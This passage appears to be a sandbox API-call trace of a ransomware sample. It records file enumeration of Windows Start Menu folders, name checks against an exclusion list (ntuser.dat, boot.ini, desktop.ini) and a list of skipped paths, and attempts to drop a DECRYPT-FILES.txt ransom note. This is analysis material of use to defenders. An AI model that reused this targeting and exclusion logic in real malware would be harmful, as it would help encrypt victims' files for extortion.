ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0186.522] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.523] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0186.523] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0186.523] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0186.523] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aadace0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1ab4d101, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ease of Access.lnk", cAlternateFileName="EASEOF~1.LNK")) returned 1 [0186.523] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.523] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="autorun.inf") returned 1 [0186.523] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="boot.ini") returned 1 [0186.523] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="desktop.ini") returned 1 [0186.523] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ntuser.dat") returned -1 [0186.523] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="iconcache.db") returned -1 [0186.523] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="bootsect.bak") returned 1 [0186.523] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ntuser.dat.log") returned -1 [0186.523] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="thumbs.db") returned -1 [0186.523] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="Bootfont.bin") returned 1 [0186.523] lstrlenW (lpString="Ease of Access.lnk") returned 18 [0186.523] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.523] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a911c5d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1a98407e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Magnify.lnk", cAlternateFileName="")) returned 1 [0186.523] lstrcmpiW (lpString1="Magnify.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.523] lstrcmpiW (lpString1="Magnify.lnk", lpString2="autorun.inf") returned 1 [0186.523] lstrcmpiW (lpString1="Magnify.lnk", lpString2="boot.ini") returned 1 [0186.523] lstrcmpiW (lpString1="Magnify.lnk", lpString2="desktop.ini") returned 1 [0186.523] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ntuser.dat") returned -1 [0186.523] lstrcmpiW (lpString1="Magnify.lnk", lpString2="iconcache.db") returned 1 [0186.523] lstrcmpiW (lpString1="Magnify.lnk", lpString2="bootsect.bak") returned 1 [0186.523] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ntuser.dat.log") returned -1 [0186.523] lstrcmpiW (lpString1="Magnify.lnk", lpString2="thumbs.db") returned -1 [0186.523] lstrcmpiW (lpString1="Magnify.lnk", lpString2="Bootfont.bin") returned 1 [0186.523] lstrlenW (lpString="Magnify.lnk") returned 11 [0186.523] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.523] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b733f17, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b733f17, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Narrator.lnk", cAlternateFileName="")) returned 1 [0186.523] lstrcmpiW (lpString1="Narrator.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.523] lstrcmpiW (lpString1="Narrator.lnk", lpString2="autorun.inf") returned 1 [0186.523] lstrcmpiW (lpString1="Narrator.lnk", lpString2="boot.ini") returned 1 [0186.523] lstrcmpiW (lpString1="Narrator.lnk", lpString2="desktop.ini") returned 1 [0186.523] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ntuser.dat") returned -1 [0186.523] lstrcmpiW (lpString1="Narrator.lnk", lpString2="iconcache.db") returned 1 [0186.523] lstrcmpiW (lpString1="Narrator.lnk", lpString2="bootsect.bak") returned 1 [0186.523] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ntuser.dat.log") returned -1 [0186.524] lstrcmpiW (lpString1="Narrator.lnk", lpString2="thumbs.db") returned -1 [0186.524] lstrcmpiW (lpString1="Narrator.lnk", lpString2="Bootfont.bin") returned 1 [0186.524] lstrlenW (lpString="Narrator.lnk") returned 12 [0186.524] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.524] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a9f649f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 1 [0186.524] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.524] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="autorun.inf") returned 1 [0186.524] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="boot.ini") returned 1 [0186.524] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="desktop.ini") returned 1 [0186.524] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ntuser.dat") returned 1 [0186.524] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="iconcache.db") returned 1 [0186.524] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="bootsect.bak") returned 1 [0186.524] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ntuser.dat.log") returned 1 [0186.524] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="thumbs.db") returned -1 [0186.524] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="Bootfont.bin") returned 1 [0186.524] lstrlenW (lpString="On-Screen Keyboard.lnk") returned 22 [0186.524] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.524] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a9f649f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 0 [0186.524] FindClose (in: hFindFile=0x479a38 | out: hFindFile=0x479a38) returned 1 [0186.525] CloseHandle (hObject=0xffffffff) returned 0 [0186.526] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a53d8cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2a53d8cd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x0, dwReserved1=0x0, cFileName="Command Prompt.lnk", cAlternateFileName="COMMAN~1.LNK")) returned 1 [0186.526] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0186.526] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="autorun.inf") returned 1 [0186.526] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="boot.ini") returned 1 [0186.526] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="desktop.ini") returned -1 [0186.526] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ntuser.dat") returned -1 [0186.526] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="iconcache.db") returned -1 [0186.526] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="bootsect.bak") returned 1 [0186.526] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ntuser.dat.log") returned -1 [0186.526] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="thumbs.db") returned -1 [0186.526] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="Bootfont.bin") returned 1 [0186.526] lstrlenW (lpString="Command Prompt.lnk") returned 18 [0186.526] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.526] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0cc8cc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0cc8cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0cc8cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.526] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.526] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec08153b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0186.526] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.526] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0186.526] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0186.526] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0186.526] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d655ee8, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d73a72a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notepad.lnk", cAlternateFileName="")) returned 1 [0186.526] lstrcmpiW (lpString1="Notepad.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.526] lstrcmpiW (lpString1="Notepad.lnk", lpString2="autorun.inf") returned 1 [0186.526] lstrcmpiW (lpString1="Notepad.lnk", lpString2="boot.ini") returned 1 [0186.526] lstrcmpiW (lpString1="Notepad.lnk", lpString2="desktop.ini") returned 1 [0186.526] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ntuser.dat") returned -1 [0186.526] lstrcmpiW (lpString1="Notepad.lnk", lpString2="iconcache.db") returned 1 [0186.526] lstrcmpiW (lpString1="Notepad.lnk", lpString2="bootsect.bak") returned 1 [0186.526] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ntuser.dat.log") returned -1 [0186.526] lstrcmpiW (lpString1="Notepad.lnk", lpString2="thumbs.db") returned -1 [0186.526] lstrcmpiW (lpString1="Notepad.lnk", lpString2="Bootfont.bin") returned 1 [0186.526] lstrlenW (lpString="Notepad.lnk") returned 11 [0186.526] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.526] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dcf29a8, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfec52d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Run.lnk", cAlternateFileName="")) returned 1 [0186.526] lstrcmpiW (lpString1="Run.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.527] lstrcmpiW (lpString1="Run.lnk", lpString2="autorun.inf") returned 1 [0186.527] lstrcmpiW (lpString1="Run.lnk", lpString2="boot.ini") returned 1 [0186.527] lstrcmpiW (lpString1="Run.lnk", lpString2="desktop.ini") returned 1 [0186.527] lstrcmpiW (lpString1="Run.lnk", lpString2="ntuser.dat") returned 1 [0186.527] lstrcmpiW (lpString1="Run.lnk", lpString2="iconcache.db") returned 1 [0186.527] lstrcmpiW (lpString1="Run.lnk", lpString2="bootsect.bak") returned 1 [0186.527] lstrcmpiW (lpString1="Run.lnk", lpString2="ntuser.dat.log") returned 1 [0186.527] lstrcmpiW (lpString1="Run.lnk", lpString2="thumbs.db") returned -1 [0186.527] lstrcmpiW (lpString1="Run.lnk", lpString2="Bootfont.bin") returned 1 [0186.527] lstrlenW (lpString="Run.lnk") returned 7 [0186.527] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.527] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0186.527] lstrcmpW (lpString1="System Tools", lpString2=".") returned 1 [0186.527] lstrcmpW (lpString1="System Tools", lpString2="..") returned 1 [0186.527] lstrcatW (in: lpString1="System Tools", lpString2="\\" | out: lpString1="System Tools\\") returned="System Tools\\" [0186.527] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="System Tools\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\" [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Program Files") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch=":\\Windows") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Games\\") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\All Users") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="AhnLab") returned 0x0 [0186.527] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.527] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 96 [0186.527] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.527] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\0a16c9.tmp") returned 107 [0186.527] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.534] GetLastError () returned 0x5 [0186.534] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 96 [0186.534] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.534] wsprintfW (in: param_1=0x36fdb84, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\DECRYPT-FILES.txt") returned 114 [0186.534] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.535] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\") returned 96 [0186.535] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*" [0186.535] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479a38 [0186.536] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.536] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.536] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.536] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.536] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ddd71ea, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0d0d6f, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="computer.lnk", cAlternateFileName="")) returned 1 [0186.536] lstrcmpiW (lpString1="computer.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0186.536] lstrcmpiW (lpString1="computer.lnk", lpString2="autorun.inf") returned 1 [0186.536] lstrcmpiW (lpString1="computer.lnk", lpString2="boot.ini") returned 1 [0186.536] lstrcmpiW (lpString1="computer.lnk", lpString2="desktop.ini") returned -1 [0186.536] lstrcmpiW (lpString1="computer.lnk", lpString2="ntuser.dat") returned -1 [0186.536] lstrcmpiW (lpString1="computer.lnk", lpString2="iconcache.db") returned -1 [0186.536] lstrcmpiW (lpString1="computer.lnk", lpString2="bootsect.bak") returned 1 [0186.536] lstrcmpiW (lpString1="computer.lnk", lpString2="ntuser.dat.log") returned -1 [0186.536] lstrcmpiW (lpString1="computer.lnk", lpString2="thumbs.db") returned -1 [0186.536] lstrcmpiW (lpString1="computer.lnk", lpString2="Bootfont.bin") returned 1 [0186.536] lstrlenW (lpString="computer.lnk") returned 12 [0186.536] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.536] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dd8af29, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e084aaf, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Control Panel.lnk", cAlternateFileName="CONTRO~1.LNK")) returned 1 [0186.536] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0186.536] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="autorun.inf") returned 1 [0186.536] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="boot.ini") returned 1 [0186.536] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="desktop.ini") returned -1 [0186.536] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ntuser.dat") returned -1 [0186.536] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="iconcache.db") returned -1 [0186.536] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="bootsect.bak") returned 1 [0186.536] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ntuser.dat.log") returned -1 [0186.536] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="thumbs.db") returned -1 [0186.536] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="Bootfont.bin") returned 1 [0186.536] lstrlenW (lpString="Control Panel.lnk") returned 17 [0186.536] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.536] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ceee20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ceee20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ceee20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.536] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.536] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec119aaf, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0186.536] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.537] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0186.537] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0186.537] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0186.537] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6392a20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5db, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (No Add-ons).lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 